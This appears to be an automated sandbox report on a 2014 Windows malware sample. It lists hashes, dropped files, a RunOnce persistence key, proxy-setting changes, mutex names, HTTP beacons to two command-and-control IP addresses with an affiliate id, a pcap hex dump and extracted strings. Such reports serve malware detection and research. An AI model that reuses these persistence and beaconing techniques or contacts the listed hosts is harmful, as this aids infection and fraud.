Analysis Date2014-06-20 07:23:08
MD5afeb57b496b344e67adee8e85d3ca692
SHA1bf339840dd9489bc2b5d4c9650186ed5d2d085be

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: afb9d9ceca2bf895db297b1de94183ec sha1: b776112fca15c815a9eb0858fc5b9d8b0b57c642 size: 3072
Section.rdata md5: 71bd85bb43b56450d4aa015c8d1872d4 sha1: dbb40b452fa1895ccf0567d2a2e531747189c5f2 size: 3072
Section.data md5: 0f343b0931126a20f133d67c2b018a3b sha1: 60cacbf3d72e1e7834203da608037b1bf83b40e8 size: 1024
Section.rsrc md5: b9e5f4ac67b553058bddf82282fe3efb sha1: 4089230e3c7231bb0a63979d0e81d423434eb983 size: 4608
Timestamp1970-01-01 05:06:15
PEhashfa456a4c1a5018c55a107bf00ef0ccd6ba55aa0a
IMPhashdccf31d8227df492e890fa1b0a7111b3

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\bf339840dd9489bc2b5d4c9650186ed5d2d085be
Creates FileC:\Documents and Settings\All Users\Application Data\jLfLgDb06108\jLfLgDb06108.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\a394B.tmp
Deletes FileC:\bf339840dd9489bc2b5d4c9650186ed5d2d085be
Creates Process"C:\Documents and Settings\All Users\Application Data\jLfLgDb06108\jLfLgDb06108.exe" "C:\malware.exe"
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\aE2C9.tmp"
Creates MutexDon't stop me! I need some money!

Process
↳ "C:\Documents and Settings\All Users\Application Data\jLfLgDb06108\jLfLgDb06108.exe" "C:\malware.exe"

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\jLfLgDb06108 ➝
C:\Documents and Settings\All Users\Application Data\jLfLgDb06108\jLfLgDb06108.exe\\x00
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\All Users\Application Data\jLfLgDb06108\jLfLgDb06108
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates MutexDon't stop me! I give work and money for you!
Winsock DNS69.50.195.76

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\aE2C9.tmp"

Network Details:

HTTP GEThttp://194.28.113.214/lurl.php?affid=06108
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
HTTP POSThttp://69.50.195.76/install.php?affid=06108
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
Flows TCP192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP192.168.1.1:1032 ➝ 69.50.195.76:80

Raw Pcap
0x00000000 (00000)   47455420 2f6c7572 6c2e7068 703f6166   GET /lurl.php?af
0x00000010 (00016)   6669643d 30363130 38204854 54502f31   fid=06108 HTTP/1
0x00000020 (00032)   2e310d0a 52656665 7265723a 20687474   .1..Referer: htt
0x00000030 (00048)   703a2f2f 3139342e 32382e31 31332e32   p://194.28.113.2
0x00000040 (00064)   31340d0a 41636365 70743a20 2a2f2f2a   14..Accept: *//*
0x00000050 (00080)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000060 (00096)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000070 (00112)   7469626c 653b204d 53494520 372e303b   tible; MSIE 7.0;
0x00000080 (00128)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000090 (00144)   20475442 302e303b 202e4e45 5420434c    GTB0.0; .NET CL
0x000000a0 (00160)   5220312e 312e3433 3232290d 0a486f73   R 1.1.4322)..Hos
0x000000b0 (00176)   743a2031 39342e32 382e3131 332e3231   t: 194.28.113.21
0x000000c0 (00192)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a43 61636865   eep-Alive..Cache
0x000000e0 (00224)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000f0 (00240)   68650d0a 0d0a                         he....

0x00000000 (00000)   504f5354 202f696e 7374616c 6c2e7068   POST /install.ph
0x00000010 (00016)   703f6166 6669643d 30363130 38204854   p?affid=06108 HT
0x00000020 (00032)   54502f31 2e310d0a 52656665 7265723a   TP/1.1..Referer:
0x00000030 (00048)   20687474 703a2f2f 36392e35 302e3139    http://69.50.19
0x00000040 (00064)   352e3736 0d0a4163 63657074 3a202a2f   5.76..Accept: */
0x00000050 (00080)   2f2a0d0a 436f6e74 656e742d 54797065   /*..Content-Type
0x00000060 (00096)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000070 (00112)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000080 (00128)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000090 (00144)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x000000a0 (00160)   6d706174 69626c65 3b204d53 49452037   mpatible; MSIE 7
0x000000b0 (00176)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x000000c0 (00192)   2e313b20 47544230 2e303b20 2e4e4554   .1; GTB0.0; .NET
0x000000d0 (00208)   20434c52 20312e31 2e343332 32290d0a    CLR 1.1.4322)..
0x000000e0 (00224)   486f7374 3a203639 2e35302e 3139352e   Host: 69.50.195.
0x000000f0 (00240)   37360d0a 436f6e74 656e742d 4c656e67   76..Content-Leng
0x00000100 (00256)   74683a20 37340d0a 436f6e6e 65637469   th: 74..Connecti
0x00000110 (00272)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000120 (00288)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x00000130 (00304)   6f2d6361 6368650d 0a0d0a64 6174613d   o-cache....data=
0x00000140 (00320)   44373145 41373231 43373845 32463336   D71EA721C78E2F36
0x00000150 (00336)   31353137 38354233 38344434 35463334   151785B384D45F34
0x00000160 (00352)   44373531 38393446 41303635 39393733   D751894FA0659973
0x00000170 (00368)   45334145 42453435 31363942 44424237   E3AEBE45169BDBB7
0x00000180 (00384)   30313034 31                           01041


Strings
..
~0DKJ,
0I\<6vFn
0]oJKN8
0$p7zl
0r[]Mdq1
>0(_.s$_
&-:]:1!
	1{4zB
1Amyq[
1m=m%{Y
1{[NO78*0Xy
@~*1p)
1TjVO\M
1WI:9!
- 2/%3
23@BGvE
2!8oE[
2{?g1`
2~rE[s9b
2{Rt<|
	_2\*|X
?;!`3$
/38L;A`
~3d-7Y
3eF<<mQ
3.J[1,
]3K"0:
([3L5.
3^N{[b
3Oy	pj	4
3&q5H2
-^3zm1uSe<
41k.X2
4AZ2RE#
\)4Cz`
&%4gz#
4yT}TQ
5?<1vj
+5H~-1
5^K%P|
5nG95TW
:~5o8fw
&5!qmg_6
{5\=w>[
-5ZL-J>
 62>P=
]66{\Pg
~^67&4
	6=a(n
?'6Z:$
/)7:/)7:/)7^),2D
"7,HTy1
@7m7"X
>7$o	 }
7r-Pud'j
7vb'W|
>7Y)4u
8Bs+vC
8-'JA-
8loJr;
8P9VFJ=
8Q!_<)
8Q)'Zgp1
+),8ZNSbOC-q-
9eo.;h>
9iH`r>
9k(1#+u
>9v?<gU
<9zW|*
A7C?Bk
A87":?
.A8%-;9
`A8<c1DQ
a8gyJo
A+a)p?
aAT!H6
AC(Xu+K
Ag#!t6
Aj|o	j
ak+NyK
a\kzDB
+AN;*u	
A)PTvFmQ
>asQ^r=
aTrksU
.[ ~avh
>AZ3He
b3H#"Z
B:4 lo
_b (AO
!+B<c]
]bC;T/
bd(7I>
BeginPaint
B+FOz{
$/bji]8
b/lVD:
_bo<\6
B~pTjH5
bRWT ^
Bs7n"?
+bs	SK~
bSuNn5ZJ
BTO=KE
BY.%XR~v
C`}8_&
cd	cH@
c=He[h<R
Ci]*!Xvq
CJg+ S*X
$ Ck3IW
*Cl+Cq:kaI
c'nUG+L
<cuJDv
c[:xaQ
+CXNgN
C|Z<'N
d01Kk(
d69`5 >
d6a(mV
D@7TC#<
D@9?6%
DAM}Opk
DestroyLinkInfo
dE',YbN
d.Gc>%
dH05G%Iu
dJtQP\
`dO9tea
D:Q<;7UM
Dq&V`4
DrawTextA
d]s[BQM
Dui5g2
D{UPsyA
DwWRUO
dY8vqPr
dzm0jS
E4ktQ)
E6}={[
e"\AUd
EBA'dd
~eCGm]
eC/lyQ\
EEidI|
ehAX@eg
e!hk>|6
EHmXfI
).[/-Ek=
E>?`$K
ek0$?F
E$!'KB
EndPaint
epR-1e%
e_ p]W
e	r{Y	'
evl,~j./r
ewFy(u/
eY/IbcI
e|Z0~x}
E\ZNW5
eZ~]y@q
\f*49<J
f9KxEn
fe2d"F
Ff$?@	
FG2Sa	
FgPi(ckaDWJ
Fi.A??|=
FillRect
(^f+j/e
f&jgQ0eD
FlushFileBuffers
)fm]sh
~FNhB[
FO37K;
F<oCoG
fPjFg6
FrameRect
FreeEnvironmentStringsA
fvE*S5r,
{fwj]5WJ
FzU]pA
,*!`G:
'G{2n N+
G8KBa4
|GC@+3
GdbJ$L
GetACP
GetCanonicalPathInfoA
GetClassNameA
GetCommandLineA
GetCompressedFileSizeA
GetCurrentProcess
GetCurrentProcessId
GetCurrentThread
GetCursorPos
GetDlgItem
GetFocus
GetLinkInfoData
GetLocaleInfoA
GetModuleHandleA
GetParent
GetStdHandle
GetSystemDirectoryA
GetWindow
GetWindowTextLengthA
%gEVv?
.*GeW-
GEy. !
g[%&=g
(GG=g[	
)-g`*H
:_ghDh
G<L4z2
glbT|*
<gLl+8?
GlobalFree
@];gLt
?gmiM8Y
(gN*XW
G+;oqb
G_%P+h
?@gQ#4_?
GQWsE1
GtlP(M
Gu($63
g",ur@
GUzUiE{
*G.Wv*
gYh0kW` W
|gy.Yh0o
G@Zo'v
GZx%GZx
H'[1x[;
h5gpIS
H6c?69
)h8U>y
HD(G8}QAZ
HeapCreate
&He-?T(
>HGXZVz
H^IIfg0
hJH`t:hH
"HkPj"
hl<DZa
!hq2!h
H{s@fG
h.tP!~
Hv/-p_
H)|wc~
H/X\8\
h x{"NN
hy/e'K#M`
HZOs8e/
hZU#kh
i0U}h@v)_
&=inKUX\q
InterlockedExchange
_I@'o$
IsDebuggerPresent
IsIconic
IsValidLinkInfo
?I"TUv
?i"U8$f
^iV<A	ot
!	IWS1
j2ql_+
>j~3 8Mp
'j'*5^
~.#jhfN
j	|kxu
JNf8EM
+jp|e@
j	%SK"
jTm$lT
j"vj}a
J+x_kX'+
JXy.KXy.K
[]#jZi
@|[ k0
;K=577
k7k5f5;
KB5#fe!
Kb-i`D
kCW)iX
KERNEL32.dll
Kjm;g2a
kKdMkK)
	"%k_L
k.LtZd/
;K=M2K
^kM/[u
kn$tHG
k=pt'M
KPt~W+
K'S~p<
KSZEn0?m
=kt}cQRg 
}k}]xR
?l(1=NjZI\l
L>1Q/A
L_5z31
L9xxJX
&}LAgJc9
lArS53%?
}@lCj/Y
LhN1:Y
LHq9ab
L#~.?I
LINKINFO.dll
l_jRFQm
=L!)=k-2
:?!Lm%
L#m]4|s#
lMU'W1
LM%w0L
"(LN-k
LogEventA
lq#H}CF
LRtJls
]L"s m
L`Tt>0!
lt]z_\
lwhUnL
lYI3Y	^#
m0@YB3g^G
.M2f(P^
M$<7}$d7
{*M850q
m.:c>(\
{!`M/>d
mDs#yj
mehX[O
mEJ!!M
M)^<IA
M<jn_nK
mLt^cG
m@ng>g
mnk'>9
mOevo^
!m*ow* _-
{MqD;\
mR~/!T0
M>T@#2
mTKT<u
.%?Mv<
MWmgmW#
Mxx2~>
mXXUP!
@M) Y3
N0eJRc>
N1I}&GO
N-=&2oHY,
n%?^*2V
N#=9;Kh
Nbfj!u/
NCN/]w0a
NDf8fp
n@j1pG
NjC]]=
`N_Laef
NQ4[=q
nRjx9kn
:nR*LV;
n|tg &~
nt	=~q
NY;1!I
;*NYb`
nzaXiq
._-NZy$
_O16@cs
O1S_wv
o4x+tGz
OaM,s2n
O&]EJtu
o<Fn=Y
of}=Q^
Oh3bQD
o(IL,]
oLJ{H1
oMb<{`
OOE`j_K
OpenSemaphoreA
:]opqJ
!oQY.XqX)
or0?AC&
O>#RUesY
?^O	+s
osBfey
oW|AW m
oW%OlW
oW&&we
O xbk@=_
oXI4J{f
;p?.@1
'P374	
P|3-F|X_C
( p4Vb7
;P|9<{ 
.p*c&_
pH$K.hp
plHVdb^c|
pMgu0fd]
p@p_Ky
PVokCa
p[|)xn
p;Y:V+
{.PZ;Y3
Q7rQZp
*qe0'iY
QHKcBZ
:=q<HS
,?q{iW
qIwft(P
:~Q{j\o7-
!QkV#}
q)"lm5J	
qnH[M>.Z
Q)NT<}y
,qo;U#R
qr?HCm\v
	q:T^lT
qVQ77g?
!Q"X|:
Qy"8 +%
QY/$L?Z
|{q}Zx(O
r0eECZ
R0wF4#
[r7m4QH
R9a"F]?zy!
rAbuo|5L
RaiseException
`.rdata
&rDG"z
!rEIATG_
ReleaseDC
ResolveLinkInfoA
RfhkYA
r!@Gdv>/
=rG&n5
=RLrsX#Tfz
ro6hX]
r		p+Y8
}*r q1
@"Rq{VK
r^S(SP
RTUTILS.dll
 +(R/v
r!WX;N
s3m/Bi
>s9oMhK
sC"NNK
seqA8C
SetActiveWindow
SetEvent
SetForegroundWindow
sF#FuH&
(sfl3w
sH$4jIfVk
s=`hj)
ShowWindow
=sJ^$m
SkIIR6
S	k?:z
*SL*Kl
sL?N U
smLe_o
sN)uq0@E
s#PB~=(
~_S>>PFc<
"sSGFR
sy^&ZWx
sZUX*]Y.i
t2.TO3
T3%=i6
t9e:t;eTt-r=tBr
tEe^*j	J
!This program cannot be run in DOS mode.
`TH)ul
#T|#Ja_{
|T_j|W
TN>^WY
}tPvrm?
tr6mpRy}
tsFW9V
t"s.I98y
tuBhz?w
'T]wVc:
T&{#XD
T~Z6jI`
)u:@(;
u6cHOxG
"ua`"ua`"~W
"uaX"uaX"~W
U:B Q_
ue6,R_
&uez&y
/u>I|2	
u`kk<)tk
uLLRk6
up25IiK
uq?:Y3
URS70>ao
USER32.dll
	uUcA<
,UWiIr$
uXlx{/
U_y<0;
-UYG0|s
v4+0Hr
v\59!W9h
v5|A{u
v5%b^K
V68m%?U
(v@&6f=
!v9sP!
ValidateRgn
Vb;Vq]/
vEgLTdk
vGf$G>
@vhh],
v|hq|m
,vi5<V
VirtualProtect
}v~K)n
v&;m^(
VMOX-t
\V$o/Q
v#'p-a
\]vqF{
&v&?QP
VUyxbNI
&VWd]qN
v|WQmk@\)
w25lh>(
W2^IdS
@{W]4/
w4[l#=
w&5BgdAu
W+7PCl
wCzt2[w6
w>Hl4i
W(jm	( 
W$j'Oz
wn~:OGZ
W=q^BY
WriteConsoleA
wsprintfA
wuiLpz
wwD&u=
wX~LyS
&W-YRb@[R
XC4@rm
X-Dg	@9
xE\~oL"
xF[,;1M
xH$-wH
 xjUyD
.(xk:`
xL9hDn
"x/Mg:
(-xP8G
Xq/?Or%1
xr>1y~
x{rO5x
XS{axN
Xtx[6J
XwG0v13
:<X#W>S0
Y2^4U1
Y2X6	3
Y6{7	K
Yfr1Ps
y}\In*
YKI#-Vw3
|)YRb,
Yt4\pf
_Y<wrRj
/YXvQRO
yzVRl/
z0qOw{
`z1M`MY3+
Z)4ba/
?Z6Xwz
z7ztVR{
@-Z}8.
?/Z$b-
z:cUWVgi
zE0;;2\cR
,}ZFuG
z=)GQA
z;.Hi[
z@ih9JvM^
Z,nDQ,
?Z|=.Oyegu
z+puJ[sf
ZS:DS[|_
Z\Sg+'